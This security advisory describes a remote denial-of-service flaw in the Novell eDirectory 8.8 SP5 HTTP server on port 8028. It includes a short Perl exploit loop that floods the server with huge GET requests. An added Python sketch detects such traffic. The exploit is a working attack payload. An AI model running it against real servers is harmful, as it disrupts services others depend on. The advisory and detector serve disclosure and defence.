The Novell eDirectory webserver version 8.8 SP5 suffers from a remote denial of service vulnerability.
Affected Software:
Novell eDirectory 8.8 SP5
Vulnerability Description:
Novell eDirectory 8.8 SP5 is vulnerable to a denial of service attack.
If a remote attacker sends an HTTP request containing Unicode strings to port 8028
(8028 is the default port of the Novell eDirectory DHost HTTP server),
the attacker can cause the system to consume 100% of the CPU resources.
Credits to:
Hellcode Research
Original Advisory:
http://tcc.hellcode.net/advisories/hellcode-adv003.txt
Exploit:
- snip -
....
$data = "?" x 500000;
for($i= 0; $i < 1000; $i++)
{
    $sock= new IO::Socket::INET( PeerAddr => "localhost",
                                 PeerPort => 8028,
                                 Proto => 'tcp',
                                 Type => SOCK_STREAM,
                               );
    print $sock "GET /$data HTTP/1.0\r\n\r\n";
    close($sock);
}
...
- snip -
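
Detection sketch for the traffic described in this advisory, added here as an example and not part of the original advisory: it flags requests to port 8028 whose request-target is oversized or contains non-ASCII bytes, and counts them per source. The length ceiling, burst threshold, event tuple format and sample events are assumptions constructed for illustration.

```python
from collections import Counter

DHOST_PORT = 8028        # default DHost HTTP port named in the advisory
MAX_TARGET_LEN = 8192    # assumed ceiling for a legitimate request-target
BURST_THRESHOLD = 20     # assumed: flagged requests per source before alerting


def inspect_request(raw):
    """Return the reasons an HTTP request line looks abnormal (empty list if none)."""
    line = raw.split(b"\r\n", 1)[0]
    parts = line.split(b" ")
    if len(parts) < 2:
        return ["malformed request line"]
    target = parts[1]
    reasons = []
    if len(target) > MAX_TARGET_LEN:
        reasons.append("request-target is %d bytes" % len(target))
    if any(byte > 0x7F for byte in target):
        reasons.append("request-target contains non-ASCII bytes")
    return reasons


def find_sources(events):
    """events: iterable of (src_ip, dst_port, raw_request_bytes).

    Returns {src_ip: count} for sources that sent at least BURST_THRESHOLD
    flagged requests to the DHost port.
    """
    hits = Counter()
    for src, port, raw in events:
        if port == DHOST_PORT and inspect_request(raw):
            hits[src] += 1
    return {src: n for src, n in hits.items() if n >= BURST_THRESHOLD}


# Constructed sample events (documentation-range addresses, not real traffic).
LONG_UNICODE = b"GET /" + "\u00e9".encode("utf-8") * 6000 + b" HTTP/1.0\r\n\r\n"
SAMPLE = (
    [("192.0.2.10", 8028, b"GET / HTTP/1.0\r\n\r\n")]
    + [("198.51.100.7", 8028, LONG_UNICODE)] * 25
    + [("203.0.113.5", 80, b"GET /" + b"A" * 9000 + b" HTTP/1.0\r\n\r\n")]
)

if __name__ == "__main__":
    for src, count in find_sources(SAMPLE).items():
        print("%s: %d flagged requests to port %d" % (src, count, DHOST_PORT))
```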